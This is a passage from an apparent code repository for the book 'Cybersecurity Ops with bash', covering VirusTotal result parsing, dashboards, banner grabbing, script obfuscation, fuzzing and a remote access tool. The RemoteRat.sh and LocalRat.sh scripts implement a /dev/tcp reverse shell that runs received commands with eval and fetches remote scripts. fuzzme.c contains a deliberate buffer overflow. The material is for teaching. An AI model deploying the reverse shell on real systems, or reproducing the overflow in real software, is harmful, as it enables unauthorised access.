    "content": "{\"scans\": {\"Bkav\": {\"detected\": true, \"version\": \"1.3.0.9466\", \"result\": \"W32.WannaCrypLTE.Trojan\", \"update\": \"20180712\"}, \"MicroWorld-eScan\": {\"detected\": true, \"version\": \"14.0.297.0\", \"result\": \"Trojan.Ransom.WannaCryptor.H\", \"update\": \"20180712\"}, \"CMC\": {\"detected\": false, \"version\": \"1.1.0.977\", \"result\": null, \"update\": \"20180712\"}, \"CAT-QuickHeal\": {\"detected\": true, \"version\": \"14.00\", \"result\": \"Trojan.Mauvaise.SL1\", \"update\": \"20180712\"}, \"McAfee\": {\"detected\": true, \"version\": \"6.0.6.653\", \"result\": \"Ransom-O\", \"update\": \"20180712\"}, \"Cylance\": {\"detected\": true, \"version\": \"2.3.1.101\", \"result\": \"Unsafe\", \"update\": \"20180712\"}, \"Zillya\": {\"detected\": true, \"version\": \"2.0.0.3593\", \"result\": \"Trojan.WannaCryptGen.Win32.2\", \"update\": \"20180712\"}, \"SUPERAntiSpyware\": {\"detected\": true, \"version\": \"5.6.0.1032\", \"result\": \"Ransom.WannaCrypt/Variant\", \"update\": \"20180712\"}, \"TheHacker\": {\"detected\": true, \"version\": \"6.8.0.5.3314\", \"result\": \"Trojan/Exploit.CVE-2017-0147.a\", \"update\": \"20180712\"}, \"K7GW\": {\"detected\": true, \"version\": \"10.53.27735\", \"result\": \"Exploit ( 0050d7a31 )\", \"update\": \"20180712\"}, \"K7AntiVirus\": {\"detected\": true, \"version\": \"10.53.27740\", \"result\": \"Exploit ( 0050d7a31 )\", \"update\": \"20180712\"}, \"Arcabit\": {\"detected\": false, \"version\": \"1.0.0.831\", \"result\": null, \"update\": \"20180712\"}, \"TrendMicro\": {\"detected\": true, \"version\": \"10.0.0.1040\", \"result\": \"WORM_WCRY.A\", \"update\": \"20180712\"}, \"Baidu\": {\"detected\": true, \"version\": \"1.0.0.2\", \"result\": \"Win32.Worm.Rbot.a\", \"update\": \"20180712\"}, \"NANO-Antivirus\": {\"detected\": true, \"version\": \"1.0.116.23366\", \"result\": \"Trojan.Win32.Wanna.eoqegc\", \"update\": \"20180712\"}, \"Cyren\": {\"detected\": true, \"version\": \"6.0.0.4\", \"result\": \"W32/Trojan.ZTSA-8671\", \"update\": \"20180712\"}, \"Symantec\": {\"detected\": true, \"version\": \"1.6.0.0\", \"result\": \"Ransom.Wannacry\", \"update\": \"20180712\"}, \"TotalDefense\": {\"detected\": false, \"version\": \"37.1.62.1\", \"result\": null, \"update\": \"20180712\"}, \"TrendMicro-HouseCall\": {\"detected\": true, \"version\": \"9.950.0.1006\", \"result\": \"WORM_WCRY.A\", \"update\": \"20180712\"}, \"Avast\": {\"detected\": true, \"version\": \"18.4.3895.0\", \"result\": \"Win32:WanaCry-A [Trj]\", \"update\": \"20180712\"}, \"ClamAV\": {\"detected\": true, \"version\": \"0.100.1.0\", \"result\": \"Win.Ransomware.WannaCry-6313787-0\", \"update\": \"20180712\"}, \"Kaspersky\": {\"detected\": true, \"version\": \"15.0.1.13\", \"result\": \"Trojan-Ransom.Win32.Wanna.m\", \"update\": \"20180712\"}, \"BitDefender\": {\"detected\": true, \"version\": \"7.2\", \"result\": \"Trojan.Ransom.WannaCryptor.H\", \"update\": \"20180712\"}, \"Babable\": {\"detected\": false, \"version\": \"9107201\", \"result\": null, \"update\": \"20180406\"}, \"Paloalto\": {\"detected\": true, \"version\": \"1.0\", \"result\": \"generic.ml\", \"update\": \"20180712\"}, \"AegisLab\": {\"detected\": true, \"version\": \"4.2\", \"result\": \"Troj.Ransom.W32!c\", \"update\": \"20180712\"}, \"Rising\": {\"detected\": true, \"version\": \"25.0.0.20\", \"result\": \"Exploit.EternalBlue!1.AAED (CLASSIC)\", \"update\": \"20180712\"}, \"Ad-Aware\": {\"detected\": true, \"version\": \"3.0.5.370\", \"result\": \"Trojan.Ransom.WannaCryptor.H\", \"update\": \"20180712\"}, \"Emsisoft\": {\"detected\": true, \"version\": \"2018.4.0.1029\", \"result\": \"Trojan-Ransom.WanaCrypt0r (A)\", \"update\": \"20180712\"}, \"Comodo\": {\"detected\": true, \"version\": \"29335\", \"result\": \"TrojWare.Win32.WannaCry.jet\", \"update\": \"20180712\"}, \"F-Secure\": {\"detected\": true, \"version\": \"11.0.19100.45\", \"result\": \"Trojan.Ransom.WannaCryptor.H\", \"update\": \"20180712\"}, \"DrWeb\": {\"detected\": true, \"version\": \"7.0.33.6080\", \"result\": \"Trojan.Encoder.11432\", \"update\": \"20180712\"}, \"VIPRE\": {\"detected\": true, \"version\": \"68066\", \"result\": \"Trojan.Win32.Generic!BT\", \"update\": \"20180712\"}, \"Invincea\": {\"detected\": true, \"version\": \"6.3.5.26121\", \"result\": \"heuristic\", \"update\": \"20180601\"}, \"McAfee-GW-Edition\": {\"detected\": true, \"version\": \"v2017.3010\", \"result\": \"BehavesLike.Win32.RansomWannaCry.wc\", \"update\": \"20180712\"}, \"Sophos\": {\"detected\": true, \"version\": \"4.98.0\", \"result\": \"Troj/Ransom-EMG\", \"update\": \"20180712\"}, \"SentinelOne\": {\"detected\": true, \"version\": \"1.0.17.227\", \"result\": \"static engine - malicious\", \"update\": \"20180701\"}, \"F-Prot\": {\"detected\": true, \"version\": \"4.7.1.166\", \"result\": \"W32/WannaCrypt.D\", \"update\": \"20180712\"}, \"Jiangmin\": {\"detected\": true, \"version\": \"16.0.100\", \"result\": \"Trojan.WanaCry.i\", \"update\": \"20180712\"}, \"Webroot\": {\"detected\": true, \"version\": \"1.0.0.403\", \"result\": \"W32.Ransom.Wannacry\", \"update\": \"20180712\"}, \"Avira\": {\"detected\": true, \"version\": \"8.3.3.6\", \"result\": \"TR/Ransom.IZ\", \"update\": \"20180712\"}, \"Fortinet\": {\"detected\": true, \"version\": \"5.4.247.0\", \"result\": \"W32/WannaCryptor.H!tr.ransom\", \"update\": \"20180712\"}, \"Antiy-AVL\": {\"detected\": true, \"version\": \"3.0.0.1\", \"result\": \"Trojan[Ransom]/Win32.Scatter\", \"update\": \"20180712\"}, \"Kingsoft\": {\"detected\": false, \"version\": \"2013.8.14.323\", \"result\": null, \"update\": \"20180712\"}, \"Endgame\": {\"detected\": true, \"version\": \"3.0.0\", \"result\": \"malicious (high confidence)\", \"update\": \"20180711\"}, \"Microsoft\": {\"detected\": true, \"version\": \"1.1.15000.2\", \"result\": \"Ransom:Win32/WannaCrypt\", \"update\": \"20180712\"}, \"ViRobot\": {\"detected\": true, \"version\": \"2014.3.20.0\", \"result\": \"Trojan.Win32.S.WannaCry.3723264.S\", \"update\": \"20180712\"}, \"ZoneAlarm\": {\"detected\": true, \"version\": \"1.0\", \"result\": \"Trojan-Ransom.Win32.Wanna.m\", \"update\": \"20180712\"}, \"Avast-Mobile\": {\"detected\": false, \"version\": \"180711-22\", \"result\": null, \"update\": \"20180712\"}, \"TACHYON\": {\"detected\": true, \"version\": \"2018-07-12.02\", \"result\": \"Ransom/W32.WannaCry.Zen\", \"update\": \"20180712\"}, \"AhnLab-V3\": {\"detected\": true, \"version\": \"3.13.1.21452\", \"result\": \"Trojan/Win32.WannaCryptor.R200572\", \"update\": \"20180712\"}, \"ALYac\": {\"detected\": true, \"version\": \"1.1.1.5\", \"result\": \"Trojan.Ransom.WannaCryptor\", \"update\": \"20180712\"}, \"AVware\": {\"detected\": true, \"version\": \"1.6.0.52\", \"result\": \"Trojan.Win32.Generic!BT\", \"update\": \"20180712\"}, \"MAX\": {\"detected\": true, \"version\": \"2017.11.15.1\", \"result\": \"malware (ai score=100)\", \"update\": \"20180712\"}, \"VBA32\": {\"detected\": true, \"version\": \"3.12.32.0\", \"result\": \"TrojanRansom.Wanna\", \"update\": \"20180712\"}, \"Malwarebytes\": {\"detected\": true, \"version\": \"2.1.1.1115\", \"result\": \"Ransom.WannaCrypt\", \"update\": \"20180712\"}, \"Zoner\": {\"detected\": true, \"version\": \"1.0\", \"result\": \"Trojan.Wannacry\", \"update\": \"20180711\"}, \"ESET-NOD32\": {\"detected\": true, \"version\": \"17703\", \"result\": \"Win32/Exploit.CVE-2017-0147.A\", \"update\": \"20180712\"}, \"Tencent\": {\"detected\": true, \"version\": \"1.0.0.1\", \"result\": \"Trojan.Win32.WannaCry.b\", \"update\": \"20180712\"}, \"Yandex\": {\"detected\": true, \"version\": \"5.5.1.3\", \"result\": \"Exploit.CVE-2017-0147!\", \"update\": \"20180712\"}, \"Ikarus\": {\"detected\": true, \"version\": \"0.1.5.2\", \"result\": \"Trojan-Ransom.WannaCry\", \"update\": \"20180712\"}, \"eGambit\": {\"detected\": false, \"version\": null, \"result\": null, \"update\": \"20180712\"}, \"GData\": {\"detected\": true, \"version\": \"A:25.17758B:25.12706\", \"result\": \"Win32.Trojan-Ransom.WannaCry.D\", \"update\": \"20180712\"}, \"AVG\": {\"detected\": true, \"version\": \"18.4.3895.0\", \"result\": \"Win32:WanaCry-A [Trj]\", \"update\": \"20180712\"}, \"Cybereason\": {\"detected\": true, \"version\": \"1.2.27\", \"result\": \"malicious.7c37d2\", \"update\": \"20180225\"}, \"Panda\": {\"detected\": true, \"version\": \"4.6.4.2\", \"result\": \"Trj/RansomCrypt.K\", \"update\": \"20180712\"}, \"CrowdStrike\": {\"detected\": true, \"version\": \"1.0\", \"result\": \"malicious_confidence_100% (W)\", \"update\": \"20180530\"}, \"Qihoo-360\": {\"detected\": true, \"version\": \"1.0.0.1120\", \"result\": \"Win32/Trojan.Multi.daf\", \"update\": \"20180712\"}}, \"scan_id\": \"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c-1531416969\", \"sha1\": \"e889544aff85ffaf8b0d0da705105dee7c97fe26\", \"resource\": \"db349b97c37d22f5ea1d1841e3c89eb4\", \"response_code\": 1, \"scan_date\": \"2018-07-12 17:36:09\", \"permalink\": \"https://www.virustotal.com/file/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/analysis/1531416969/\", \"verbose_msg\": \"Scan finished, information embedded\", \"total\": 68, \"positives\": 61, \"sha256\": \"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\", \"md5\": \"db349b97c37d22f5ea1d1841e3c89eb4\"}"
  },
  {
    "path": "ch11/helloworld.c",
    "content": "#include <stdio.h>\n\nint main()\n{\n  printf(\"Hello World!\\n\");\n  return 0;\n}\n"
  },
  {
    "path": "ch11/vtjson.awk",
    "content": "# Cybersecurity Ops with bash\n# vtjson.awk\n#\n# Description: \n# Search a JSON file for VirusTotal malware hits\n#\n# Usage:\n# vtjson.awk <json file>\n#   <json file> File containing results from VirusTotal\n#\n\nFN=\"${1:-Calc_VirusTotal.txt}\"\nsed -e 's/{\"scans\": {/&\\n /' -e 's/},/&\\n/g' \"$FN\" |     # <1>\nawk '\nNF == 9 {                                       # <2>\n    COMMA=\",\"\n    QUOTE=\"\\\"\"                                  # <3>\n    if ( $3 == \"true\" COMMA ) {                 # <4>\n        VIRUS=$1                                # <5>\n        gsub(QUOTE, \"\", VIRUS)                  # <6>\n\n        RESLT=$7\n        gsub(QUOTE, \"\", RESLT)\n        gsub(COMMA, \"\", RESLT)\n\n        print VIRUS, \"- result:\", RESLT\n    }\n}'\n\n"
  },
  {
    "path": "ch11/vtjson.sh",
    "content": "#!/bin/bash -\n#\n# Rapid Cybersecurity Ops\n# vtjson.sh\n#\n# Description: \n# Search a JSON file for VirusTotal malware hits\n#\n# Usage:\n# vtjson.awk [<json file>]\n#   <json file> File containing results from VirusTotal\n#               default: Calc_VirusTotal.txt\n#\n\nRE='^.(.*)...\\{.*detect..(.*),..vers.*result....(.*).,..update.*$'     # <1>\n\nFN=\"${1:-Calc_VirusTotal.txt}\"\nsed -e 's/{\"scans\": {/&\\n /' -e 's/},/&\\n/g' \"$FN\" |           # <2>\nwhile read ALINE\ndo\n    if [[ $ALINE =~ $RE ]]                                     # <3>\n    then\n\tVIRUS=\"${BASH_REMATCH[1]}\"                                    # <4>\n\tFOUND=\"${BASH_REMATCH[2]}\"\n\tRESLT=\"${BASH_REMATCH[3]}\"\n\tif [[ $FOUND =~ .*true.* ]]                                   # <5>\n\tthen\n\t    echo $VIRUS \"- result:\" $RESLT\n\tfi\n    fi\ndone\n"
  },
  {
    "path": "ch12/tagit.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# tagit.sh\n#\n# Description: \n# Place open and close tags around a string\n#\n# Usage:\n# tagit.sh <tag> <string>\n#   <tag> Tag to use\n#   <string> String to tag\n#\n\nprintf '<%s>%s</%s>\\n' \"${1}\" \"${2}\" \"${1}\"\n"
  },
  {
    "path": "ch12/webdash.sh",
    "content": "#!/bin/bash -\n#\n# Rapid Cybersecurity Ops\n# webdash.sh\n#\n# Description: \n# Create an information dashboard\n# Heading\n# --------------\n# 1-line of output\n# --------------\n# 5 lines of output\n# ...\n# --------------\n# column labels and then\n# 8 lines of histograms\n# ...\n# --------------\n#\n\n# some important constant strings\nUPTOP=$(tput cup 0 0)                               # <1>\nERAS2EOL=$(tput el)\nREV=$(tput rev)\t\t# reverse video\nOFF=$(tput sgr0)\t# general reset\nSMUL=$(tput smul)\t# underline mode on (start)\nRMUL=$(tput rmul)\t# underline mode off (reset)\nCOLUMNS=$(tput cols)\t# how wide is our window\n# DASHES='------------------------------------'\nprintf -v DASHES '%*s' $COLUMNS '-'                 # <2>\nDASHES=${DASHES// /-}\n\n#\n# prSection - print a section of the screen \n#       print $1-many lines from stdin\n#       each line is a full line of text \n#       followed by erase-to-end-of-line\n#       sections end with a line of dashes\n#\nfunction prSection ()\n{\n    local -i i\t\t\t\t\t    # <3>\n    for((i=0; i < ${1:-5}; i++))\n    do\n        read aline\n        printf '%s%s\\n' \"$aline\" \"${ERAS2EOL}\"\t    # <4>\n    done\n    printf '%s%s\\n%s' \"$DASHES\" \"${ERAS2EOL}\" \"${ERAS2EOL}\"\n}\n\nfunction cleanup()\t\t\t\t    # <5>\n{\n    if [[ -n $BGPID ]] \n    then\n      kill %1\t\t\t\t\t    # <6>\n      rm -f $TMPFILE\n    fi\n} &> /dev/null\t\t\t\t\t    # <7>\n\ntrap cleanup EXIT \n\n# launch the bg process\nTMPFILE=$(tempfile)                                 # <8>\n{ bash tailcount.sh $1 | \\\n  bash livebar.sh > $TMPFILE ; } &                  # <9>\nBGPID=$!\n\nclear\nwhile true\ndo\n    printf '%s' \"$UPTOP\"\n    # heading:\n    echo \"${REV}Rapid Cyber Ops Ch. 12 -- Security Dashboard${OFF}\" \\\n    | prSection 1\n    #----------------------------------------\n    {                                               # <10>\n      printf 'connections:%4d        %s\\n' \\\n            $(netstat -an | grep 'ESTAB' | wc -l) \"$(date)\" \n    } | prSection 1\n    #----------------------------------------\n    tail -5 /var/log/syslog | cut -c 1-16,45-105 | prSection 5 \n    #----------------------------------------\n    { echo \"${SMUL}yymmdd${RMUL}\"    \\\n            \"${SMUL}hhmmss${RMUL}\"  \\\n            \"${SMUL}count of events${RMUL}\"\n      tail -8 $TMPFILE \n    } | prSection 9\n    sleep 3\ndone\n"
  },
  {
    "path": "ch12/weblogfmt.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# weblogfmt.sh\n#\n# Description: \n# Read in Apache web log and output as HTML\n#\n# Usage:\n# weblogfmt.sh input.file > output.file\n#\n\nfunction tagit()\n{\n\tprintf '<%s>%s</%s>\\n' \"${1}\" \"${2}\" \"${1}\"\n}\n\n#basic header tags\necho \"<html>\"                                            # <1>\necho \"<body>\"\necho \"<h1>$1</h1>\"   #title\n\necho \"<table border=1>\"   #table with border\necho \"<tr>\"   #new table row\necho \"<th>IP Address</th>\"  #column header\necho \"<th>Date</th>\"\necho \"<th>URL Requested</th>\"\necho \"<th>Status Code</th>\"\necho \"<th>Size</th>\"\necho \"<th>Referrer</th>\"\necho \"<th>User Agent</th>\"\necho \"</tr>\"\n\nwhile read f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 f11 f12plus    # <2>\ndo\n\techo \"<tr>\"\n\ttagit \"td\" \"${f1}\"\n\ttagit \"td\" \"${f4} ${f5}\"                        # <3>\n\ttagit \"td\" \"${f6} ${f7}\"\n\ttagit \"td\" \"${f9}\"\n\ttagit \"td\" \"${f10}\"\n\ttagit \"td\" \"${f11}\"\n\ttagit \"td\" \"${f12plus}\"\n\techo \"</tr>\"\ndone < $1\n\n#close tags\necho \"</table>\"\necho \"</body>\"\necho \"</html>\"\n\n"
  },
  {
    "path": "ch13/bannergrabber.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# bannergrabber.sh\n#\n# Description:\n# Automatically pull the banners from HTTP, SMTP,\n# and FTP servers\n#\n# Usage: ./bannergrabber.sh  hostname [scratchfile]\n#   scratchfile is used during processing but removed;\n#   default is: \"scratch.file\" or tempfile-generated name\n#\n\n#\nfunction isportopen ()\n{\n    (( $# < 2 )) && return 1                           # <1>\n    local host port\n    host=$1\n    port=$2\n    echo >/dev/null 2>&1  < /dev/tcp/${host}/${port}   # <2>\n    return $?\n}\n\nfunction cleanup ()\n{\n    rm -f \"$SCRATCH\"\n}\n\nATHOST=\"$1\"\nSCRATCH=\"$2\"\nif [[ -z $2 ]]\nthen\n    if [[ -n $(type -p tempfile) ]]\n    then\n\tSCRATCH=$(tempfile)\n    else\n    \tSCRATCH='scratch.file'\n    fi\nfi\n\ntrap cleanup EXIT                                      # <3>\ntouch \"$SCRATCH\"                                       # <4>\n\nif isportopen $ATHOST 21\t# FTP                  <5>\nthen\n    # i.e., ftp -n $ATHOST \n    exec 3<>/dev/tcp/${ATHOST}/21                      # <6>\n    echo -e 'quit\\r\\n' >&3                             # <7>\n    cat <&3  >> \"$SCRATCH\"                             # <8>\nfi\n\nif isportopen $ATHOST 25\t# SMTP\nthen\n    # i.e., telnet $ATHOST 25 \n    exec 3<>/dev/tcp/${ATHOST}/25\n    echo -e 'quit\\r\\n' >&3\n    cat <&3  >> \"$SCRATCH\"\nfi\n\nif isportopen $ATHOST 80\t# HTTP\nthen\n    curl -LIs \"https://${ATHOST}\"  >> \"$SCRATCH\"      # <9>\nfi\n\ncat \"$SCRATCH\"                                        # <10>\n\n"
  },
  {
    "path": "ch13/smtpconnect.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# smtpconnect.sh\n#\n# Description: \n# Connect to a SMTP server and print welcome banner\n#\n# Usage:\n# smtpconnect.sh <host>\n#   <host> SMTP server to connect to\n#\n\nexec 3<>/dev/tcp/\"$1\"/25\necho -e 'quit\\r\\n' >&3\ncat <&3\n"
  },
  {
    "path": "ch14/askey.sh",
    "content": "\n# functions to convert decimal to ascii and vice-versa\n\n# aschar - print the ascii character representation\n#          of the number passed in as an argument\n# example: aschar 65 ==> A\n#\nfunction aschar ()\n{\n    local ashex                             # <1>\n    printf -v ashex '\\\\x%02x' $1            # <2>\n    printf '%b' $ashex                      # <3>\n}\n\n# asnum - print the ascii (decimal) number\n#         of the character passed in as $1\n# example: asnum A ==> 65\n#\nfunction asnum ()\n{\n    printf '%d' \"\\\"$1\"                        # <4>\n}\n"
  },
  {
    "path": "ch14/innerscript.sh",
    "content": "echo \"This is an encrypted script\"\necho \"running uname -a\"\nuname -a\n"
  },
  {
    "path": "ch14/logfuscate.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# logfuscate.sh\n#\n# Description: \n# Demonstration of logic obfuscation\n#\n\nf=\"$1\"  #<1>\n\na() (\n\tb()\n\t{\n\t\tf=\"$(($f+5))\"  #<5>\n\t\tg=\"$(($f+7))\"  #<6>\n\t\tc  #<7>\n\t}\n\n\tb  #<4>\n)\n\nc() (\n\td()\n\t{\n\t\tg=\"$(($g-$f))\"  #<10>\n\t\tf=\"$(($f-2))\"  #<11>\n\t\techo \"$f\"  #<12>\n\t}\n\tf=\"$(($f-3))\"  #<8>\n\td  #<9>\n)\n\nf=\"$(($f+$2))\"  #<2>\na  #<3>\n"
  },
  {
    "path": "ch14/oneline.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# oneline.sh\n#\n# Description: \n# Demonstration of one-line script obfuscation\n#\n\nif [[ $1 == \"test\" ]]; then echo \"testing\"; else echo \"not testing\"; fi; echo\n\"some command\"; echo \"another command\"\n"
  },
  {
    "path": "ch14/readable.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# readable.sh\n#\n# Description: \n# Simple script to be obfuscated\n#\n\nif [[ $1 == \"test\" ]]\nthen \n  echo \"testing\"\nelse \n  echo \"not testing\" \nfi \n\necho \"some command\"\necho \"another command\"\n"
  },
  {
    "path": "ch14/streamcipher.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# streamcipher.sh\n#\n# Description: \n# A lightweight implementation of a stream cipher\n# Pedagogical - not recommended for serious use\n#\n# Usage:\n# streamcipher.sh [-d] <key>  < inputfile\n#   -d Decrypt mode\n#   <key> Numeric key\n#\n#\n\nsource ./askey.sh                                          # <1>\n\n#\n# Ncrypt - Encrypt - reads in characters\n#           outputs 2digit hex #s\n#\nfunction Ncrypt ()                                         # <2>\n{\n    TXT=\"$1\"\n    for((i=0; i< ${#TXT}; i++))                            # <3>\n    do\n\tCHAR=\"${TXT:i:1}\"                                  # <4>\n\tRAW=$(asnum \"$CHAR\") # \" \" needed for space (32)   # <5>\n\tNUM=${RANDOM}\n\tCOD=$(( RAW ^ ( NUM & 0x7F )))                     # <6>\n\tprintf \"%02X\" \"$COD\"                               # <7>\n    done\n    echo\t\t\t\t\t\t   # <8>\n}\n\n#\n# Dcrypt - DECRYPT - reads in a 2digit hex #s\n#           outputs characters\n#\nfunction Dcrypt ()                                  # <9>\n{\n    TXT=\"$1\"\n    for((i=0; i< ${#TXT}; i=i+2))                   # <10>\n    do\n\tCHAR=\"0x${TXT:i:2}\"                         # <11>\n\tRAW=$(( $CHAR ))                            # <12>\n\tNUM=${RANDOM}\n\tCOD=$(( RAW ^ ( NUM & 0x7F )))              # <13>\n\taschar \"$COD\"                               # <14>\n    done\n    echo\n}\n\nif [[ -n $1  &&  $1 == \"-d\" ]]                      # <15>\nthen\n    DECRYPT=\"YES\" \n    shift                                           # <16>\nfi\n\nKEY=${1:-1776}                                      # <17>\nRANDOM=\"${KEY}\"                                     # <18>\nwhile read -r                                       # <19>\ndo\n    if [[ -z $DECRYPT ]]\t                    # <20>\n    then \n\tNcrypt \"$REPLY\"\n    else\n\tDcrypt \"$REPLY\"\n    fi\n\ndone \n"
  },
  {
    "path": "ch14/synfuscate.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# synfuscate.sh\n#\n# Description: \n# Demonstration of syntax script obfuscation\n#\n\na ()   #<1>\n{\n\n\tlocal a=\"Local Variable a\"   #<2>\n\techo \"$a\"\n}\n\na=\"Global Variable a\"   #<3>\necho \"$a\"\n\na\n"
  },
  {
    "path": "ch14/wrapper.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# wrapper.sh\n#\n# Description: \n# Example of executing an encrypted \"wrapped\" script\n#\n# Usage:\n# wrapper.sh\n#    Enter the password when prompted\n#\n\nencrypted='U2FsdGVkX18WvDOyPFcvyvAozJHS3tjrZIPlZM9xRhz0tuwzDrKhKBBuugLxzp7T\nMoJoqx02tX7KLhATS0Vqgze1C+kzFxtKyDAh9Nm2N0HXfSNuo9YfYD+15DoXEGPd'   #<1>\n\nread -s word    #<2>\n\ninnerScript=$(echo \"$encrypted\" | openssl aes-256-cbc -base64 -d -pass pass:\"$word\")   #<3>\n\neval \"$innerScript\"   #<4>\n\n"
  },
  {
    "path": "ch15/fuzzer.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# fuzzer.sh\n#\n# Description: \n# Fuzz a specified argument of a program\n#\n# Usage:\n# bash fuzzer.sh <executable> <arg1> [?] <arg3> ... \n#   <executable> The target executable program/script\n#   <argn> The static arguments for the executable\n#   '?' The argument to be fuzzed\n#   example:  fuzzer.sh ./myprog -t '?' fn1 fn2\n#\n\n#\nfunction usagexit ()                            # <1>\n{\n    echo \"usage: $0 executable args\"\n    echo \"example: $0 myapp -lpt arg \\?\"\n    exit 1\n} >&2\t\t\t\t\t\t# <2>\n\nif (($# < 2))\t\t\t\t\t# <3>\nthen\n    usagexit\nfi\n\n# the app we will fuzz is the first arg\nTHEAPP=\"$1\"\nshift\t\t\t\t\t\t# <4>\n# is it really there?\ntype -t \"$THEAPP\" >/dev/null  || usagexit    # <5>\n\n# which arg to vary?\n# find the ? and note its position\ndeclare -i i\nfor ((i=0; $# ; i++))\t\t\t\t# <6>\ndo\n    ALIST+=( \"$1\" )\t\t\t\t# <7>\n    if [[ $1 == '?' ]]\n    then\n\tNDX=$i\t\t\t\t\t# <8>\n    fi\n    shift\ndone\n\n# printf \"Executable: %s  Arg: %d %s\\n\" \"$THEAPP\" $NDX \"${ALIST[$NDX]}\"\n\n# now fuzz away:\nMAX=10000\nFUZONE=\"a\"\nFUZARG=\"\"\nfor ((i=1; i <= MAX; i++))\t\t\t# <9>\ndo\n    FUZARG=\"${FUZARG}${FUZONE}\"  # aka +=\n    ALIST[$NDX]=\"$FUZARG\"\n    # order of >s is important\n    $THEAPP \"${ALIST[@]}\"  2>&1 >/dev/null      # <10>\n    if (( $? )) ; then echo \"Caused by: $FUZARG\" >&2 ; fi  # <11>\ndone\n\n"
  },
  {
    "path": "ch15/fuzzme.c",
    "content": "#include <stdio.h>\n#include <string.h>\n\n//Cybersecurity Ops with bash\n//Warning - This is an insecure program and is for demonstration\n//purposes only\n\nint main(int argc, char *argv[])\n{\n\tchar combined[50] = \"\";\n\tstrcat(combined, argv[1]);\n\tstrcat(combined, \" \");\n\tstrcat(combined, argv[2]);\n\tprintf(\"The two arguments combined is: %s\\n\", combined);\n\t\n\treturn(0);\n}\n"
  },
  {
    "path": "ch16/LocalRat.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# LocalRat.sh\n#\n# Description: \n# Remote access tool to be on a local system,\n# it listens for a connection from the remote system\n# and helps with any file transfer requested\n#\n# Usage:  LocalRat.sh  port1 [port2 [port3]]\n# \n#\n\n# define our background file transfer daemon\nfunction bgfilexfer ()\n{\n    while true\n    do\n        FN=$(nc -nlvvp $HOMEPORT2 2>>/tmp/x2.err)       # <3>\n        if [[ $FN == 'exit' ]] ; then exit ; fi\n        nc -nlp $HOMEPORT3 < $FN                        # <4>\n    done\n}\n\n\n# -------------------- main ---------------------\nHOMEPORT=$1\nHOMEPORT2=${2:-$((HOMEPORT+1))}\nHOMEPORT3=${3:-$((HOMEPORT2+1))}\n\n# initiate the background file transfer daemon\nbgfilexfer &                                            # <1>\n\n# listen for an incoming connection \nnc -nlvp $HOMEPORT                                      # <2>\n\n"
  },
  {
    "path": "ch16/RemoteRat.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# RemoteRat.sh\n#\n# Description: \n# Remote access tool to be run on the remote system;\n# mostly hands any input to the shell\n# but if indicated (with a !) fetch and run a script\n#\n# Usage:  RemoteRat.sh  hostname port1 [port2 [port3]]\n# \n\n\nfunction cleanup ()\n{\n    rm -f $TMPFL\n}\n\nfunction runScript ()\n{\n    # tell 'em what script we want\n    echo \"$1\" > /dev/tcp/${HOMEHOST}/${HOMEPORT2}     # <7>\n    # stall \n    sleep 1                                           # <8>\n    if [[ $1 == 'exit' ]] ; then exit ; fi\n    cat > $TMPFL </dev/tcp/${HOMEHOST}/${HOMEPORT3}   # <9>\n    bash $TMPFL                                       # <10>\n}\n\n# -------------------  MAIN -------------------\n# could do some error checking here \nHOMEHOST=$1\nHOMEPORT=$2\nHOMEPORT2=${3:-$((HOMEPORT+1))}\nHOMEPORT3=${4:-$((HOMEPORT2+1))}\n\nTMPFL=\"/tmp/$$.sh\"\ntrap cleanup EXIT\n\n# phone home:\nexec  </dev/tcp/${HOMEHOST}/${HOMEPORT} 1>&0 2>&0     # <1>\n\nwhile true\ndo\n    echo -n '$ '                                      # <2>\n    read -r                                           # <3>\n    if [[ ${REPLY:0:1} == '!' ]]                      # <4>\n    then\n\t# it's a script\n        FN=${REPLY:1}                                 # <5>\n\trunScript $FN\n    else\n\t# normal case - run the cmd\n\teval \"$REPLY\"                                 # <6>\n    fi\ndone\n\n"
  },
  {
    "path": "ch19/pingmonitor.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# pingmonitor.sh\n#\n# Description: \n# Use ping to monitor host availability\n#\n# Usage:\n# pingmonitor.sh <file> <seconds>\n#   <file> File containing a list of hosts\n#   <seconds> Number of seconds between pings\n#\n\nwhile true\ndo\n clear\t\n echo 'Cybersecurity Ops System Monitor'\n echo 'Status: Scanning ...'\n echo '-----------------------------------------'\n while read -r ipadd \n do\n  ipadd=$(echo \"$ipadd\" | sed 's/\\r//')   #<1>\n  ping -n 1 \"$ipadd\" | egrep '(Destination host unreachable|100%)' &> /dev/null   #<2>\n  if (( \"$?\" == 0 ))   #<3>\n  then\n   tput setaf 1\t#<4>\n   echo \"Host $ipadd not found - $(date)\" | tee -a monitorlog.txt   #<5>\n   tput setaf 7\n  fi\n done < \"$1\"\n\t\n echo \"\"\n echo \"Done.\"\n\n for ((i=\"$2\"; i > 0; i--))   #<6>\n do\n  tput cup 1 0   #<7>\n  echo \"Status: Next scan in $i seconds\"\n  sleep 1\n done\t\ndone\n \n"
  },
  {
    "path": "ch20/softinv.sh",
